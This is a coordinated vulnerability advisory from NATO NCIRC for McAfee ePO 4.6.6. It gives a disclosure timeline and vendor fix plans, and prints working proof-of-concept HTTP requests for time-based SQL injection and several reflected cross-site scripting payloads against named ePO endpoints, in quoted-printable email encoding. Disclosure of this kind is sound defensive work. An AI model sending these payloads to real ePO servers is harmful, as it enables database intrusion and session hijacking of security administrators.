Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC
Multiple vulnerabilities in McAfee ePO 4.6.6
=20
Affected Product:
McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions
=20
Timeline:
=20
08 June 2013 - Vulnerability found
12 June 2013 - Vendor informed
12 June 2013 - Vendor replied/confirmed & opened service ticket
12 July 2013 - Vendor responded with dates for solutions
=20
Credits:
Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int)
=20
CVE: To be assigned
=20
NCIRC ID: NCIRC-2013127-01
=20
Description:
Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL
injection were identified in the latest version of McAfee ePO (4.6.6).
All identified vulnerabilities were discovered post authentication.
=20
Vulnerability Details:
=20
1. SQL injection
a. GET
/core/showRegisteredTypeDetails.do?registeredTypeID=3Depo.rt.computer&uid=
=3D
6waitf
or%20delay'0%3a0%3a20'--
&index=3D0&datasourceID=3D&orion.user.security.token=3D2LoWTAOfWJ4ZCjxY&a=
jax
Mode=3Dstandard HTTP/1.1
b.
/EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=3Depo.rt.computer=
&uid=3D1;%20WAITFOR%20DELAY%20'0:0:0';--
&datasourceID=3DListDataSource.orion.dashboard.chart.datasource.core.quer=
y
Factory
%3Aquery.2&index=3D0 HTTP/1.1
McAfee Solution:
Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013.
Item "b" has been addressed per Security Bulletin SB10043.
(https://kc.mcafee.com/corporate/index?page=3D3Dcontent&id=3D3DSB10043)
=20
=20
2. Reflected XSS
a. POST /core/loadDisplayType.do HTTP/1.1=3D20
displayType=3Dtext_lookup&operator=3Deq&propKey=3DEPOLeafNode.AgentVersio=
n&ins
tanceId=3D<script>alert(182667)</script>&orion.user.security.token=3DZCFb=
pCp
y3ldihsCW&ajaxMode=3Dstandard
=20
b. POST /console/createDashboardContainer.do HTTP/1.1
displayType=3Dtext_lookup&operator=3Deq&propKey=3DEPOLeafNode.AgentVersio=
n&ins
tanceId=3D<script>alert(182667)</script>&orion.user.security.token=3DZCFb=
pCp
y3ldihsCW&ajaxMode=3Dstandard
=20
c. POST /console/createDashboardContainer.do HTTP/1.1
elementId=3D3DcustomURL.dashboard.factory%3Ainstance&index=3D3D2&pageid=3D=
3D30
&
width=3D3D1118&height=3D3D557&refreshInterval=3D3D5&refreshIntervalUnit=3D=
3DMIN&
filteringEnabled=3D3Dfalse&mo
nitorUrl=3D3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</=
s
cript>&orion.user.sec
urity.token=3D3D9BslgbJEv2JqQy3k&ajaxMode=3D3Dstandard
=20
d. GET
/ComputerMgmt/sysDetPanelBoolPie.do?uid=3D1";</script><script>alert(14798=
1
)</script>&orion.user.security.token=3DZCFbpCpy3ldihsCW&ajaxMode=3Dstanda=
rd
HTTP/1.1
=20
e. GET
/ComputerMgmt/sysDetPanelQry.do?uid=3D<script>alert(149031)</script>&orio=
n
..user.security.token=3DZCFbpCpy3ldihsCW&ajaxMode=3Dstandard HTTP/1.1
=20
f. GET
/ComputerMgmt/sysDetPanelQry.do?uid=3D>"'><script>alert(30629)</script>&o=
r
ion.user.security.token=3D>"'><script>alert(30629)</script>&ajaxMode=3D>"=
'><
script>alert(30629)</script> HTTP/1.1
=20
g. GET
/ComputerMgmt/sysDetPanelSummary.do?uid=3D<script>alert(146243)</script>&=
o
rion.user.security.token=3DZCFbpCpy3ldihsCW&ajaxMode=3Dstandard HTTP/1.1
=20
h. GET
/ComputerMgmt/sysDetPanelSummary.do?uid=3D>"'><script>alert(30565)</scrip=
t
>&orion.user.security.token=3D>"'><script>alert(30565)</script>&ajaxMode=3D=
>
"'><script>alert(30565)</script> HTTP/1.1
=20
McAfee Solution:
Each of these items will be addressed in ePO 4.6.7 due out in late Q3
2013.
=20